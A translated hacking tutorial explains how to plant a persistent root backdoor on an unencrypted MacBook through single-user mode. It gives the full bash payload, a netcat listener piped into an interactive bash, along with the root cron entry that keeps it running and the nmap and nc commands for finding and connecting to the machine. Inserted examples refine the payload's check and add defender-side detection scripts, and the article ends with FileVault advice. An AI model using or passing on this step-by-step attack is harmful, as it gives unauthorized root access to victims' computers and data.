Backdoor on any MacBook in 5 minutes

Flame wars about which operating system is more secure, macOS or Windows, are an eternal topic. Most people will say macOS, but this article shows how to plant a backdoor on a MacBook in a few minutes of physical access, and then keep the shell alive using nothing but tools that ship with macOS.
Windows 10 is certainly not the benchmark for security, but the aim here is to debunk the common belief that macOS is secure out of the box.
Surprisingly, macOS (at least the version tested here) does not enable FileVault disk encryption by default (it only offers to enable it during a clean install or upgrade), and does not enable its application firewall by default. Some users who do turn FileVault on later disable it, believing that it slows disk writes or loads the processor. Without disk encryption, anyone with physical access can read every file on the MacBook without knowing a password, and that is exactly what this attack relies on.

"Living off the land" and staying self-sufficient
There are plenty of payloads, RATs and backdoors that can be deployed against a MacBook. For simplicity this article uses the technique called "living off the land", which encourages pentesters to use as much of what is already on the compromised device as possible during post-exploitation. That means not dropping additional payloads that have to actively evade antivirus; instead, you use programs that are already installed on the system and so are not flagged as malicious.
Netcat (called nc in the console) is a network utility for creating TCP or UDP connections. Its feature list includes port scanning, file transfer, and listening on a port, which is what makes it usable as a backdoor. Netcat ships with macOS and is the first tool this attack relies on.
Cron is a task scheduler found on Unix-like operating systems such as Debian, Ubuntu and macOS. Administrators use cron jobs to automate repetitive tasks, such as weekly backups or running a command after every reboot. To make sure the netcat backdoor is always available, a cron job is created that starts a fresh netcat listener whenever the previous one has exited.
This attack was tested on a MacBook Air using macOS version 10.13.4 with the latest Apple APFS file system.

Step 1. Boot into single-user mode
The attack starts from single-user mode, one of the built-in boot modes of macOS. It was designed for troubleshooting, debugging boot failures and repairing disks, among other administrative tasks. Unfortunately, on a Mac without FileVault and without a firmware password it takes nothing more than a key combination to get into, so it is a standing target for anyone with physical access. (A firmware password blocks single-user mode on Intel Macs, and Macs with Apple silicon do not have this boot mode at all.)
To enter single-user mode, power on the target MacBook while holding Command + S. Keep holding both keys until white text appears on a black screen.
Within a few seconds the attacker has a root shell and access to every file on the disk, with no password asked. That is all it takes. If the target does have FileVault enabled, booting with Command + S instead prompts for the password of a FileVault-enabled user, and the device is immune to this attack.

Step 2. Check the disk
From the single-user prompt, first run fsck, the macOS file system checker. This command does nothing to compromise the device, but it is the first of the two commands macOS itself prints at the single-user prompt and should not be skipped. In our test, fsck finished in under 60 seconds on a 250 GB SSD.
Code:
/sbin/fsck -fy

Step 3: Mount the disk read-write
In single-user mode the root file system is mounted read-only. Remount it with write permission so that files can be written to the laptop; with a writable disk you can create the netcat backdoor.
Code:
/sbin/mount -uw /

Step 4: Creating the netcat payload
Keeping the backdoor reachable as the compromised device moves between Wi-Fi networks in different parts of the world (that is, a reverse shell to an external host) is beyond the scope of this article, so stay tuned. For now, we show how to connect to the backdoored MacBook from the same Wi-Fi network.
For simplicity, the script that keeps the listener running is saved in /etc/ under the name payload. In a real attack it would make sense to hide the file in a less obvious directory under a less obvious name.
To create a payload file, you can use the Nano editor using the command below:
Code:
nano /etc/payload

Type the following bash script into nano, then save and exit with Ctrl + X, then Y, then Enter. The script has to be typed by hand in single-user mode, so it is kept as short as possible. It does several things, so each line is described below for readers who are not familiar with bash.
Code:
#!/bin/bash
# Look for a running listener. The [1] stops grep from matching its own
# command line; matching the full nc command (not just "1234") avoids false
# positives from PIDs or memory sizes that happen to contain 1234.
n=$(ps aux | grep -o 'nc -l 0.0.0.0 [1]234')

if [[ -z "$n" ]]; then
  # Named pipe that carries the shell's output back into netcat.
  rm -f /tmp/f
  mkfifo /tmp/f
  nc -l 0.0.0.0 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1
fi

The netcat listener opens port 1234 on the macOS device. The first line (n=$(ps aux | grep -o 'nc -l 0.0.0.0 [1]234')) stores in the variable n whether the listener is already running. The check uses ps, the tool for listing running processes, and greps its output for the listener's command line; the square brackets around the 1 are an old trick that stops grep from matching its own command line in the ps output. Note that grepping for the bare string 1234 would also match any process whose PID or memory size contains 1234, in which case the listener would silently never start.
The next line (if [[ -z "$n" ]]; then) begins an if statement: if n is empty (no listener found), mkfifo, the tool for creating a named pipe, creates a pipe at /tmp/f (any stale one is removed first). The name f is arbitrary and chosen for brevity.
The line after mkfifo is the netcat command (nc -l 0.0.0.0 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1). It listens on port 1234 on every interface (0.0.0.0), feeds whatever arrives on the connection into an interactive bash, and sends bash's output and errors back through the named pipe into netcat, so the connected attacker sees a shell.
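The liveness check deserves a closer look, because it is what decides whether the listener ever starts. The following added example (not part of the original post) compares a loose check that greps for the bare string 1234, the way the article's first version did, with one that requires the listener's command line. It runs over two constructed `ps aux` snapshots: one with no listener but a process whose RSS column happens to be 1234, and one with the listener running. The ps lines, the ensure_listener helper and the /tmp/f pipe path are assumptions for the demonstration.

```bash
#!/bin/bash
# Added example, not part of the original post: why the liveness check in the
# payload must match the netcat command line rather than the bare string 1234.
# Both checks read `ps aux` output on stdin and print 1 (listener seen) or 0.

# Constructed `ps aux` output: no listener, but one process whose RSS is 1234.
PS_NO_LISTENER='USER  PID %CPU %MEM  VSZ  RSS   TT STAT STARTED   TIME COMMAND
root    1  0.0  0.1 4300 1234 ??   Ss   9:00AM 0:01.00 /sbin/launchd
root   50  0.0  0.0 4200  800 ??   S    9:00AM 0:00.10 /usr/sbin/cron'

# Constructed `ps aux` output: the backdoor listener is running.
PS_LISTENER='USER  PID %CPU %MEM  VSZ  RSS   TT STAT STARTED   TIME COMMAND
root    1  0.0  0.1 4300  900 ??   Ss   9:00AM 0:01.00 /sbin/launchd
root   77  0.0  0.0 4100  700 ??   S    9:05AM 0:00.05 nc -l 0.0.0.0 1234'

# Loose check: any "1234" anywhere in the ps output counts as "listener running".
# The [1] only stops grep from matching its own command line; it does nothing
# about PIDs, memory sizes or unrelated arguments that contain 1234.
loose_check() {
  if [ -n "$(grep -o '[1]234')" ]; then echo 1; else echo 0; fi
}

# Strict check: require the exact listener command line.
strict_check() {
  if grep -q 'nc -l 0\.0\.0\.0 [1]234'; then echo 1; else echo 0; fi
}

# How the payload would use the strict check (defined only, not run here,
# because it would block inside nc waiting for a connection).
ensure_listener() {
  if [ "$(ps aux | strict_check)" = 0 ]; then
    rm -f /tmp/f
    mkfifo /tmp/f
    nc -l 0.0.0.0 1234 < /tmp/f | /bin/bash -i > /tmp/f 2>&1
  fi
}

printf '%s\n' "$PS_NO_LISTENER" | loose_check    # prints 1: false positive from RSS 1234
printf '%s\n' "$PS_NO_LISTENER" | strict_check   # prints 0
printf '%s\n' "$PS_LISTENER"    | strict_check   # prints 1
```

With the loose check, a single unrelated process whose PID or memory figure contains 1234 is enough to convince the cron job that the backdoor is up, so it never starts; the strict pattern only fires on the listener itself.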

Step 5. Using cron to run the payload
The netcat script is done. Next, crontab, cron's editing tool, is used to schedule the bash script (the payload file) every 60 seconds. Since this is typed at the single-user root prompt, the entry lands in root's crontab. Use the command below:
Code:
env EDITOR=nano crontab -e

nano opens in the terminal. Enter the following line, then save and close nano:
Code:
* * * * * /etc/payload

If you need to use cron jobs with an interval other than 60 seconds, then read Ole Michelsen's article on using crontab in macOS (formerly Mac OS X).

Step 6: Make the payload executable
The last step is to make the payload file executable. The article uses chmod 777 (world-readable, -writable and -executable); 755 would be enough for cron to run it as root, and a world-writable file in /etc is one more thing for a defender to notice.
Code:
chmod 777 /etc/payload

Step 7: Shut down your Mac
When you're done, enter the command below in the console to turn off your laptop:
Code:
shutdown -h now

That is all it takes to backdoor a macOS device. When the owner turns the laptop on, cron runs the script every 60 seconds; if no listener is running, a new one is started, and anyone on the same Wi-Fi network can connect to it.
Victims who never look at listening ports, root's crontab or background processes are unlikely to notice this backdoor. Future articles will show how to improve the script and obfuscate it to evade detection, so stay tuned.

Step 8. Connect to the backdoored Mac
From any computer on the same network, Nmap can be used to find the IP address of the backdoored device. OS detection needs raw sockets, so nmap must run as root:
Code:
sudo nmap -p1234,65534 -O 192.168.0.1/24

OS detection (the -O flag) needs at least one open and one closed port to fingerprint a host, which is why an arbitrary second port is included in the command. Netcat was configured to listen on port 1234, so that port is scanned explicitly. If there are several Apple devices on the network, the backdoored MacBook will be the only one reporting port 1234 as open.
Once the IP address of the backdoored device is known, connect to it with netcat. This is as simple as:
Code:
nc 192.168.0.65 1234

Step 9. Fix the shell environment
As mentioned earlier, post-exploitation is best done "living off the land", using the programs and tools already present in the operating system to push further into the target.
After connecting to the netcat listener, the shell is extremely bare. Because it was started by cron, it inherits cron's minimal environment, with a PATH of roughly /usr/bin:/bin that does not include /sbin or /usr/sbin. Running ifconfig (which lives in /sbin) therefore fails with "ifconfig: command not found".
To fix this, source the system profile, which sets up the full PATH:
Code:
source /etc/profile

Using ifconfig now works as expected.

Step 10. Fingerprinting the backdoored device
Now the software and hardware can be enumerated. For example, Apple's built-in system_profiler command gathers the hardware and software details needed to choose further payloads and exploits, and uname shows the kernel version.
Keep an eye out for future articles explaining how to keep access to an already compromised MacBook as it moves between Wi-Fi networks anywhere in the world, how to obfuscate netcat to evade detection, and how to build and use full-featured payloads.

How to protect yourself from single-user mode attacks
If you do not want an attacker doing all of this to your computer, the answer is simple: enable FileVault. Apple's full-disk encryption prevents unauthorized access to the data on the drive and makes single-user mode unusable without a user's password. On Intel Macs, setting a firmware password in Recovery additionally blocks single-user mode and other alternate boot modes outright.
You can enable FileVault from System Preferences, then Security & Privacy, then the FileVault tab, by clicking "Turn On FileVault" (you may need to unlock the settings first). After the process completes, the MacBook restarts and asks for a password every time it starts. No account can log in automatically, and a password is required before single-user mode becomes available.
You should also not leave your computer unattended, especially in places where a hacker can gain physical access to it.
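Step 7 claims that victims who do not scan listening ports and background services will not notice the backdoor; the flip side is that the two artifacts it leaves, an every-minute entry in root's crontab and a netcat process listening on a TCP port, are easy to check for. The following added example (not from the original post) implements those two checks as shell functions that read command output on stdin. Here they run over constructed samples of `sudo crontab -l` and `lsof -nP -iTCP -sTCP:LISTEN` output; the sample lines, the function names and the set of "suspicious" directories are assumptions for the demonstration.

```bash
#!/bin/bash
# Added example, not from the original post: defender-side checks for the two
# artifacts this backdoor leaves, a root cron entry and a netcat listener.
# The functions read command output on stdin; here they run over constructed
# samples. On a live Mac you would pipe the real output in:
#   sudo crontab -l | flag_cron_entries
#   sudo lsof -nP -iTCP -sTCP:LISTEN | flag_listeners

# Constructed `sudo crontab -l` output: one legitimate job and the every-minute payload.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * 0 /usr/local/bin/backup.sh
* * * * * /etc/payload'

# Constructed `lsof -nP -iTCP -sTCP:LISTEN` output: sshd plus the nc listener.
SAMPLE_LSOF='COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
sshd      120 root    3u  IPv6 0xaaaa      0t0  TCP *:22 (LISTEN)
nc         77 root    3u  IPv4 0xbbbb      0t0  TCP *:1234 (LISTEN)'

# Report cron lines that run every minute, or that execute something out of
# /etc, /tmp or /var/tmp, where a hand-typed payload is likely to live.
flag_cron_entries() {
  grep -v '^#' | awk '($1=="*" && $2=="*" && $3=="*" && $4=="*" && $5=="*") ||
                      $6 ~ "^/(etc|tmp|var/tmp)/" { print }'
}

# Report listening TCP sockets owned by netcat or a shell; a legitimate daemon
# is almost never named nc or bash. Prints "COMMAND pid=PID ADDRESS".
flag_listeners() {
  awk 'NR > 1 && $1 ~ "^(nc|netcat|bash|sh|zsh)$" { print $1, "pid=" $2, $(NF-1) }'
}

printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_entries   # * * * * * /etc/payload
printf '%s\n' "$SAMPLE_LSOF" | flag_listeners         # nc pid=77 *:1234
```

Both checks are deliberately narrow: they catch this article's backdoor as written, and the obvious variations on it, but an attacker who renames the listener binary or schedules it through launchd instead of cron needs a different check (launchctl list and the LaunchDaemons directories), which the article itself flags as a topic for a follow-up.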
Disclaimer: This article is written for educational purposes only. The author or publisher did not publish this article for malicious purposes. If readers would like to use the information for personal gain, the author and publisher are not responsible for any harm or damage caused.

Images: helpugroup.ru